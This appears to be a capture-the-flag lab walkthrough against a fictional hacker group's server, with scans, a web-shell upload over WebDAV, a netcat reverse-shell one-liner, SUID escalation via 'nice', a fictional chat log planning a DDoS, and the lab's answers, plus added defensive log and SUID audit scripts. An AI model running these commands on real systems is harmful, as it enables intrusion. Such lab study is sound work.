Secureless Lab
You have a mission regarding the hacker group “Melody Hacker Team”, whose activity has increased significantly recently. This group is known for unauthorized server access, DDoS and malware attacks. Your objective is to gather detailed information about the group’s activities and possible new cyber attack plans. You have access to the group’s website. We trust you will succeed in this challenging task. We wish you success!
What is the name of the service found to be insecure?
- Scan the target with nmap:
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #nmap -sC -sV -p- melodyhackerteam.hv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-14 06:57 CST
Nmap scan report for melodyhackerteam.hv (172.20.1.156)
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a:bc:c1:64:1b:a8:93:67:8c:a5:3a:c9:5e:28:94:50 (RSA)
| 256 71:07:65:ed:45:e7:b6:a5:18:c4:89:be:bc:fe:fb:01 (ECDSA)
|_ 256 1f:7f:9d:f3:96:52:6f:b8:90:7e:dc:8e:b2:d6:2c:1d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Melody Hacker Team
|_http-server-header: Apache/2.4.56 (Debian)
MAC Address: 52:54:00:A8:A6:AF (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds
- Then I enumerated directories with Gobuster:
┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u "http://melodyhackerteam.hv/" -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://melodyhackerteam.hv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 284]
/.htaccess (Status: 403) [Size: 284]
/.htpasswd (Status: 403) [Size: 284]
/css (Status: 301) [Size: 324] [--> http://melodyhackerteam.hv/css/]
/font (Status: 301) [Size: 325] [--> http://melodyhackerteam.hv/font/]
/image (Status: 301) [Size: 326] [--> http://melodyhackerteam.hv/image/]
/index.html (Status: 200) [Size: 1723]
/js (Status: 301) [Size: 323] [--> http://melodyhackerteam.hv/js/]
/server-status (Status: 403) [Size: 284]
/webdav (Status: 403) [Size: 284]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #
==> The Answer : webdav
What is the path of the “hacked by” index page used by the hacker group in zip format on the server?
- Browsing to /webdav did not work. Searching Google and asking an AI, I learned that WebDAV (Web Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol that let users collaboratively edit and manage files on a remote web server.
- Basic concepts:
  - WebDAV turns a web server from a read-only system into one that can be written to and edited
  - It lets users create, move, copy and delete files/directories on the web server
  - It works like a "network drive" over the internet
- Key features:
  - File operations:
    - PUT: upload a file to the server
    - DELETE: delete a file
    - COPY: copy a file
    - MOVE: move a file
  - Directory management:
    - MKCOL: create a new directory (Make Collection)
    - PROPFIND: retrieve information about a file/directory
  - File locking:
    - Prevents conflicts when several people edit the same file at once
    - Ensures data integrity.
- I used curl to check whether WebDAV is enabled, with the following command:
┌─[root@hackerbox]─[~]
└──╼ #curl -X OPTIONS http://melodyhackerteam.hv/webdav/ -I
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2025 02:17:47 GMT
Server: Apache/2.4.56 (Debian)
DAV: 1,2
DAV: <http://apache.org/dav/propset/fs/1>
MS-Author-Via: DAV
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
Content-Length: 0
Content-Type: httpd/unix-directory
- As the output above shows, WebDAV is enabled on the target server and it accepts methods such as GET, HEAD, POST, ...
- I used PUT to push a txt file to the target and it succeeded; the file's contents were displayed on the web. Next I tried uploading a webshell, and that succeeded too:
┌─[root@hackerbox]─[~]
└──╼ #nano shellweb.php
┌─[root@hackerbox]─[~]
└──╼ #curl -X PUT --data-binary "@shellweb.php" http://melodyhackerteam.hv/webdav/shell.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>201 Created</title>
</head><body>
<h1>Created</h1>
<p>Resource /webdav/shell.php has been created.</p>
<hr />
<address>Apache/2.4.56 (Debian) Server at melodyhackerteam.hv Port 80</address>
</body></html>
┌─[root@hackerbox]─[~]
└──╼ #
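The OPTIONS probe and the PUT above are also what a defender gets to see in the Apache access log. One caveat worth noting from this session: the Allow header returned by the server did not list PUT, yet the PUT was accepted with 201 Created, so an audit has to look at what the server actually did, not at what OPTIONS advertises. The following Python script is an added example and not part of this writeup: it parses Apache combined-format access log lines (the sample lines are constructed, modelled on this session, not captured from the lab box) and flags accepted WebDAV write methods, uploads of server-side scripts, and later requests to a file that was uploaded that way.

```python
import re

# Apache "combined" log format: client, identd, user, [timestamp], "METHOD PATH PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# WebDAV methods that change server state; OPTIONS and PROPFIND only read.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE", "PROPPATCH", "LOCK", "UNLOCK"}
# Extensions the web server would execute rather than serve as static content.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx", ".cgi")

# Constructed sample log, modelled on the session in the writeup (client IP and
# user agents are assumptions, not taken from a real log).
SAMPLE_LOG = """\
172.20.7.73 - - [19/Nov/2025:02:17:47 +0000] "OPTIONS /webdav/ HTTP/1.1" 200 0 "-" "curl/8.5.0"
172.20.7.73 - - [19/Nov/2025:02:18:03 +0000] "PUT /webdav/test.txt HTTP/1.1" 201 284 "-" "curl/8.5.0"
172.20.7.73 - - [19/Nov/2025:02:18:20 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 284 "-" "curl/8.5.0"
172.20.7.73 - - [19/Nov/2025:02:18:41 +0000] "GET /webdav/shell.php?cmd=id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Nov/2025:02:19:00 +0000] "GET /index.html HTTP/1.1" 200 1723 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text):
    """Return a list of (severity, client_ip, message) findings, in log order."""
    findings = []
    uploaded_scripts = set()  # paths created by an accepted PUT of a script file
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path = rec["ip"], rec["method"], rec["path"]
        status = int(rec["status"])
        clean = path.split("?", 1)[0]  # drop the query string for matching
        if method in WRITE_METHODS and 200 <= status < 300:
            findings.append(("medium", ip, f"{method} {clean} accepted ({status})"))
            if method == "PUT" and clean.lower().endswith(SCRIPT_EXT):
                uploaded_scripts.add(clean)
                findings.append(("high", ip, f"server-side script uploaded via WebDAV: {clean}"))
        elif method in {"GET", "POST"} and status == 200 and clean in uploaded_scripts:
            # The file that was just written is now being executed by the web server.
            findings.append(("critical", ip, f"uploaded script executed: {method} {path}"))
    return findings


if __name__ == "__main__":
    for severity, ip, msg in analyse(SAMPLE_LOG):
        print(f"[{severity:8}] {ip:15} {msg}")
```

On a real host, point `analyse()` at the contents of `/var/log/apache2/access.log`; the same logic also works on Apache `mod_dav` deployments where the WebDAV location is something other than `/webdav/`, because it keys on the method and the file extension rather than on the path. Unauthenticated write methods on a DAV location are the root cause here; the fix on the server side is to require authentication for them (a `Require` directive inside `<LimitExcept GET HEAD OPTIONS PROPFIND>` in the Apache configuration) or to disable `mod_dav` entirely if nobody uses it.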
- I browsed to webdav/shell.php and opened a shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 172.20.7.73 88 >/tmp/f
- Then, as the task asked, I used find to search:
$ find / -name "*.zip" 2>/dev/null
/var/www/webdav/web_shell_backup.zip
/var/www/webdav/melody_index.zip
==> The Answer : /var/www/webdav/melody_index.zip
What is the common name of the web shell file used by the hacker group?
- I unzipped web_shell_backup.zip; it produced a file named shell.php. Reading its contents, I found that the web shell it contains is the very same web shell I was using :))
==> The Answer : p0wny
What is the domain name of the first targeted website?
- I looked for *.db files to see whether any of them held passwords or something similar, but nothing useful turned up.
- Looking for SUID files to see whether privilege escalation was possible, I found /usr/bin/nice:
$ find / -perm -4000 2>/dev/null
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/nice
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
$
- Searched GTFOBins for nice; here it is.
$ /usr/bin/nice /bin/bash -p
whoami
root
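The escalation works only because `nice` carries a setuid bit that a stock Debian install never gives it, which is exactly the kind of drift a periodic SUID audit catches. The Python script below is an added example and not part of this writeup: it takes the output of the same `find / -perm -4000` command (the embedded sample is constructed, modelled on the listing above), compares it with an assumed baseline of setuid binaries expected on a Debian 11 host, and singles out any unexpected entry that can hand control to another program, which is what makes `nice` root for every local user. `scan_live()` does the same walk directly on a real filesystem.

```python
import os
import stat

# Constructed sample, modelled on the writeup's find(1) listing (not captured from a live host).
SAMPLE_FIND_OUTPUT = """\
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/nice
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
"""

# Assumed baseline of setuid binaries on a stock Debian 11 host; regenerate this
# from your own golden image rather than trusting the list as written here.
EXPECTED_SUID = {
    "/usr/bin/umount", "/usr/bin/gpasswd", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/bin/mount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
}

# Binaries that execute an arbitrary program or drop to a shell: setuid-root on any of
# these means root for every local user (illustrative subset of GTFOBins' "SUID" entries).
SHELL_SPAWNERS = {
    "/usr/bin/nice", "/usr/bin/env", "/usr/bin/find", "/usr/bin/bash",
    "/usr/bin/python3", "/usr/bin/perl", "/usr/bin/vim",
}


def parse_find_output(text):
    """One absolute path per non-empty line, as printed by find -perm -4000."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def audit_suid(paths, expected=EXPECTED_SUID, spawners=SHELL_SPAWNERS):
    """Split setuid paths into those outside the baseline and, worse, shell spawners."""
    unexpected = sorted(p for p in paths if p not in expected)
    dangerous = sorted(p for p in unexpected if p in spawners)
    return {"unexpected": unexpected, "dangerous": dangerous}


def remediation(path):
    # Clearing the setuid bit is the fix; stock Debian does not ship nice(1) setuid.
    return f"chmod u-s {path}"


def scan_live(roots=("/usr", "/bin", "/sbin", "/opt")):
    """Walk the given roots and return regular files that are setuid and owned by root."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)  # lstat: do not follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                    found.append(p)
    return sorted(found)


if __name__ == "__main__":
    result = audit_suid(parse_find_output(SAMPLE_FIND_OUTPUT))
    for p in result["unexpected"]:
        tag = "DANGEROUS" if p in result["dangerous"] else "review"
        print(f"[{tag}] {p}  ->  {remediation(p)}")
```

Run it from cron or a configuration-management check and alert on any non-empty `unexpected` list; the `dangerous` subset is the one that warrants an immediate `chmod u-s`. Because the baseline is a plain set, the same script audits any distribution once you replace `EXPECTED_SUID` with the list taken from a known-good image.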
- With root, just go into /root and look:
cd /root
ls
telegram_chat_backup.txt
cat *
HackerShadow, [27 Feb 2024 at 21:24:36]:
We use password management software for security. But what if it gets hacked?
CyberWolf, [27 Feb 2024 at 21:25:01]:
That's why we always need to have an offline backup and not rely solely on one platform.
DataKraken, [27 Feb 2024 at 21:25:59]:
True. Btw, did you guys check out the target for our next operation? galacticshop.hv seems vulnerable.
HackerShadow, [27 Feb 2024 at 21:26:20]:
Yeah, I did some preliminary scans. Their server at 93.184.216.34 looks like an easy target for a DDoS attack.
CyberWolf, [27 Feb 2024 at 21:26:45]:
I have a new DDoS tool we can use. It's more efficient and can bypass some of the common DDoS protection.
DataKraken, [27 Feb 2024 at 21:27:10]:
Sounds good. We should also prepare a list of proxy servers to mask our real IP addresses during the attack.
HackerShadow, [27 Feb 2024 at 21:27:35]:
Already on it. I've compiled a list from various sources. We'll be ghosts.
CyberWolf, [27 Feb 2024 at 21:28:00]:
Perfect. Let's discuss the timing. We need to ensure maximum impact.
DataKraken, [27 Feb 2024 at 21:28:25]:
How about we target their peak hours? According to my research, their server traffic peaks around 3 PM UTC.
HackerShadow, [27 Feb 2024 at 21:28:50]:
3 PM UTC it is. Let's coordinate our tools and start the prep. We need to be synchronized to overload their servers.
CyberWolf, [27 Feb 2024 at 21:29:15]:
Agreed. I'll set up the coordination chat. Let's move our discussion there for operational details.
DataKraken, [27 Feb 2024 at 21:29:40]:
Got it. I'm also checking their backup systems. If we can find a way to slow down their recovery, it'll add to the chaos.
HackerShadow, [27 Feb 2024 at 21:30:05]:
Good thinking. Keep us posted on that. Let's make this one count.
CyberWolf, [27 Feb 2024 at 21:30:00]:
This is going to be one for the books. They won't know what hit them.
HackerShadow, [27 Feb 2024 at 21:35:00]:
Everyone, check your setups. We can't afford any mistakes.
DataKraken, [27 Feb 2024 at 21:38:00]:
Everyone, check your setups. We can't afford any mistakes.
HackerShadow, [27 Feb 2024 at 21:41:00]:
Remember, timing is crucial. We hit at 3 PM UTC and not a second later.
DataKraken, [27 Feb 2024 at 21:46:00]:
Just updated our encryption for the coordination chat. We're now using a double-layered encryption method.
HackerShadow, [27 Feb 2024 at 21:49:00]:
Let's keep our communication tight. No details on the open web, not even hints.
DataKraken, [27 Feb 2024 at 21:51:00]:
How are we on the social engineering front? Any way we can manipulate someone on the inside?
DataKraken, [27 Feb 2024 at 21:54:00]:
Did anyone look into the secondary target? innovatesphere.hv could be a good distraction.
DataKraken, [27 Feb 2024 at 22:01:00]:
Just updated our encryption for the coordination chat. We're now using a double-layered encryption method.
DataKraken, [27 Feb 2024 at 22:04:00]:
Any updates on the proxy list? We need as many as we can get to make the attack more effective.
HackerShadow, [27 Feb 2024 at 22:05:00]:
How are we on the social engineering front? Any way we can manipulate someone on the inside?
DataKraken, [27 Feb 2024 at 22:06:00]:
Everyone, check your setups. We can't afford any mistakes.
CyberWolf, [27 Feb 2024 at 22:11:00]:
I'll take the lead on the secondary target. Let's spread their resources thin.
==> The Answer : galacticshop.hv
What is the IP address planned for DDoS attack?
==> The Answer : 93.184.216.34
What is the planned time of DDoS attack?
==> The Answer : 3 PM UTC
What is the domain name of the second targeted website?
==> The Answer : innovatesphere.hv